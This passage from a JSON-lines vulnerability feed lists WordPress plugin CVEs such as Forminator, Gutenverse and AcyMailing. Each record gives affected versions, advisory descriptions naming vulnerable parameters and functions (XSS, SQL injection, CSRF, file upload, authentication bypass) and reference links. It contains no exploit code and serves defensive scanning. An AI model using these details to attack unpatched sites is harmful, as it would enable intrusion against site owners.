efsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5341","slug":"forminator","versionImpact":"1.44.1","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id' and 'data-size\u2019 parameters in all versions up to, and including, 1.44.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.44.1\\\/assets\\\/forminator-ui\\\/js\\\/forminator-form.js#L985\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.44.1\\\/assets\\\/forminator-ui\\\/js\\\/forminator-form.js#L985\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306475\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306475\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/forminator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/forminator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/415bfddb-5223-439f-8a08-535f79631ff0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/415bfddb-5223-439f-8a08-535f79631ff0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7727","slug":"gutenverse","versionImpact":"3.1.0","description":"The Gutenverse plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Animated Text and Fun Fact blocks in all versions up to, and including, 3.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338801\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338801\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76cfe806-a8d9-4249-b2d0-eb3a314ca69a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76cfe806-a8d9-4249-b2d0-eb3a314ca69a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2482","slug":"responsive-css-editor","versionImpact":"1.0","description":"The Responsive CSS EDITOR WordPress plugin through 1.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0f73781-be7e-482e-91de-ad7991ad4bd5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0f73781-be7e-482e-91de-ad7991ad4bd5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2225","slug":"seo-alert","versionImpact":"1.5.9","description":"The SEO ALert WordPress plugin through 1.59 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0af475ba-5c02-4f62-876d-6235a745bbd6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0af475ba-5c02-4f62-876d-6235a745bbd6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4926","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_bulk_delete_products function. This makes it possible for unauthenticated attackers to delete products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulk\\\/bulk.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulk%2Fbulk.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulk\\\/bulk.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulk%2Fbulk.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab633506-63a1-4be1-b402-c7f0bcc4ea7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab633506-63a1-4be1-b402-c7f0bcc4ea7a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulk\\\/bulk.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulk\\\/bulk.php#L159\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6864","slug":"wp-last-modified-info","versionImpact":"1.9.0","description":"The WP Last Modified Info plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018template\u2019 attribute of the lmt-post-modified-info shortcode in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87368d85-04d4-42e6-9ba6-2a1fc3b945a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87368d85-04d4-42e6-9ba6-2a1fc3b945a8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-last-modified-info\\\/trunk\\\/inc\\\/Core\\\/Frontend\\\/PostView.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-last-modified-info\\\/trunk\\\/inc\\\/Core\\\/Frontend\\\/PostView.php#L205\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-last-modified-info\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-last-modified-info\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137253\\\/#file23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137253\\\/#file23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137253\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137253\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8093","slug":"posts-reminder","versionImpact":"0.20","description":"The Posts reminder WordPress plugin through 0.20 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7fd690a-5f02-491c-a3fb-6eac9ffffe96\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7fd690a-5f02-491c-a3fb-6eac9ffffe96\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9821","slug":"bot-for-telegram-on-woocommerce","versionImpact":"1.2.4","description":"The Bot for Telegram on WooCommerce plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'stm_wpcfto_get_settings' AJAX action in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to view the Telegram Bot Token, a secret token used to control the bot, which can then be used to log in as any existing user on the site, such as an administrator, if they know the username, due to the Login with Telegram feature.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a662c904-ba2e-494c-a603-b22eeeddf43d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a662c904-ba2e-494c-a603-b22eeeddf43d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bot-for-telegram-on-woocommerce\\\/trunk\\\/nuxy\\\/helpers\\\/helpers.php?rev=2575772#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bot-for-telegram-on-woocommerce\\\/trunk\\\/nuxy\\\/helpers\\\/helpers.php?rev=2575772#L54\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12005","slug":"wp-bibtex","versionImpact":"3.0.1","description":"The WP-BibTeX plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.1. This is due to missing or incorrect nonce validation on the wp_bibtex_option_page() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bibtex\\\/trunk\\\/wp-bibtex-options.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bibtex\\\/trunk\\\/wp-bibtex-options.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225023\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225023\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-bibtex\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-bibtex\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/077538e2-ef9a-490f-9188-31f9cb82aaf7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/077538e2-ef9a-490f-9188-31f9cb82aaf7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0368","slug":"banner-garden","versionImpact":"0.1.3","description":"The Banner Garden Plugin for WordPress plugin through 0.1.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a4f7097-082b-4375-9582-945928d765b8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a4f7097-082b-4375-9582-945928d765b8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13235","slug":"booking-system","versionImpact":"2.9.9.5.4","description":"The Pinpoint Booking System \u2013 #1 WordPress Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the 'language' parameter in all versions up to, and including, 2.9.9.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/translation\\\/class-backend-translation.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/translation\\\/class-backend-translation.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59cba7f0-cb06-4408-abba-49552dddd04c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59cba7f0-cb06-4408-abba-49552dddd04c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11917","slug":"wp-jobsearch","versionImpact":"2.9.2","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.8.8. This is due to improper configurations in the 'jobsearch_xing_response_data_callback', 'set_access_tokes', and 'google_callback' functions. This makes it possible for unauthenticated attackers to log in as the first connected Xing user, or any connected Xing user if the Xing id is known. It is also possible for unauthenticated attackers to log in as the first connected Google user if the user has logged in, without subsequently logging out, in thirty days. The vulnerability was partially patched in version 2.8.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6de8a608-8715-4f9c-9f2f-df60dd1cc579?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6de8a608-8715-4f9c-9f2f-df60dd1cc579?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4924","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","description":"The BEAR for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.1.3.3. This is due to missing capability checks on the woobe_bulkoperations_delete function. This makes it possible for authenticated attackers, with subscriber access or higher, to delete products.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L344\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L344\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dfd0246-4265-4dde-8a1e-18b7042eae74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dfd0246-4265-4dde-8a1e-18b7042eae74?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1449","slug":"master-slider","versionImpact":"3.9.5","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ms_slide shortcode in all versions up to, and including, 3.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af9adb6b-f726-4b74-be5c-82fdab0ae1f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af9adb6b-f726-4b74-be5c-82fdab0ae1f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8092","slug":"accordion-image-menu","versionImpact":"3.1.3","description":"The Accordion Image Menu WordPress plugin through 3.1.3 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5a91ceb-8a92-4f99-b7b7-1c4e0a587022\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5a91ceb-8a92-4f99-b7b7-1c4e0a587022\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9592","slug":"paypal-gift-certificate","versionImpact":"1.2.3","description":"The Easy PayPal Gift Certificate plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the 'wpppgc_plugin_options' function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72880e44-b0e0-47f4-82f0-c36c81091ba8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72880e44-b0e0-47f4-82f0-c36c81091ba8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-gift-certificate\\\/tags\\\/1.2.3\\\/paypal-gift-certificate.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-gift-certificate\\\/tags\\\/1.2.3\\\/paypal-gift-certificate.php#L200\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9886","slug":"wp-baidu-map","versionImpact":"1.2.2","description":"The WP Baidu Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'baidu_map' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd917ae-3fa2-47b5-ace7-1462647e2352?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd917ae-3fa2-47b5-ace7-1462647e2352?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-baidu-map\\\/trunk\\\/wp-baidu-map.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-baidu-map\\\/trunk\\\/wp-baidu-map.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-baidu-map\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-baidu-map\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13332","slug":"transfinanz","versionImpact":"1.0.0","description":"The TransFinanz WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35b53a2d-9a8b-49e7-9553-ea09c9c50d66\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35b53a2d-9a8b-49e7-9553-ea09c9c50d66\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6572","slug":"stepbyteservice-openstreetmap","versionImpact":"1.2.0","description":"The OpenStreetMap for Gutenberg and WPBakery Page Builder (formerly Visual Composer) WordPress plugin through 1.2.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c7a8ac-1acd-45b7-abe5-5635fbb5d4c1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c7a8ac-1acd-45b7-abe5-5635fbb5d4c1\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c7a8ac-1acd-45b7-abe5-5635fbb5d4c1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c7a8ac-1acd-45b7-abe5-5635fbb5d4c1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4923","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_bulkoperations_delete function. This makes it possible for unauthenticated attackers to delete products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L344\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L344\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a4db03d-ec40-4145-aa95-fee78bda5205?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a4db03d-ec40-4145-aa95-fee78bda5205?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0611","slug":"master-slider","versionImpact":"3.9.5","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the slides callback functionality in all versions up to, and including, 3.9.5. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0611\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0611\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3594","slug":"idonate","versionImpact":"1.9.0","description":"The IDonate  WordPress plugin through 1.9.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a8a834a-e5d7-4678-9d35-4390d1200437\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a8a834a-e5d7-4678-9d35-4390d1200437\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7384","slug":"acymailing","versionImpact":"9.7.2","description":"The AcyMailing \u2013 An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the acym_extractArchive function in all versions up to, and including, 9.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c747bc9-582c-4b9f-85a4-469c446d50f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c747bc9-582c-4b9f-85a4-469c446d50f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acymailing\\\/trunk\\\/back\\\/libraries\\\/wordpress\\\/file.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acymailing\\\/trunk\\\/back\\\/libraries\\\/wordpress\\\/file.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/acymailing\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/acymailing\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acymailing.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.acymailing.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Facymailing&old=3118953&new_path=%2Facymailing&new=3137644&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Facymailing&old=3118953&new_path=%2Facymailing&new=3137644&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137644\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137644\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
